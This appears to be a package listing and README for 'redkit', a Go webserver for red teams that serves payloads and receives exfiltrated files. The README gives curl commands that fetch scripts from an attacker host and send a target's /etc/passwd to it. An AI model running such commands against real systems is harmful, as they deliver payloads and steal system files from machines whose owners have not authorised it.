redkit

command module
v0.0.0-...-85e830f Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: May 14, 2022 License: MIT Imports: 9 Imported by: 0

README

Redkit

A red team's toolkit webserver. Quickly spin up a webserver that can deliver your payloads curated to target architecture, and easily exfiltrate data over https.

Current Features

Creates a webserver in the current directory that serves files out of bin/. Simply curl http://attacker.lan:8080/bin/yourscripts.sh.

Build an image of your target's filesystem by sending POST request multipart forms. Example:

curl -F "/etc/passwd=@/etc/passwd" http://attacker.lan:8080/chroot

The result will be placed in chroot/.

Roadmap

  • bin follows symlinks and serves the actual file
  • Add ability to send directory listings to the chroot, with proper file permissions
  • Configure default programs linked to bin based on architecture
  • Create basic shell scripts for sending and receiving files from target machine. (include in bin)

Documentation

The Go Gopher

There is no documentation for this package.

Directories

Path Synopsis
cmd
pkg

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL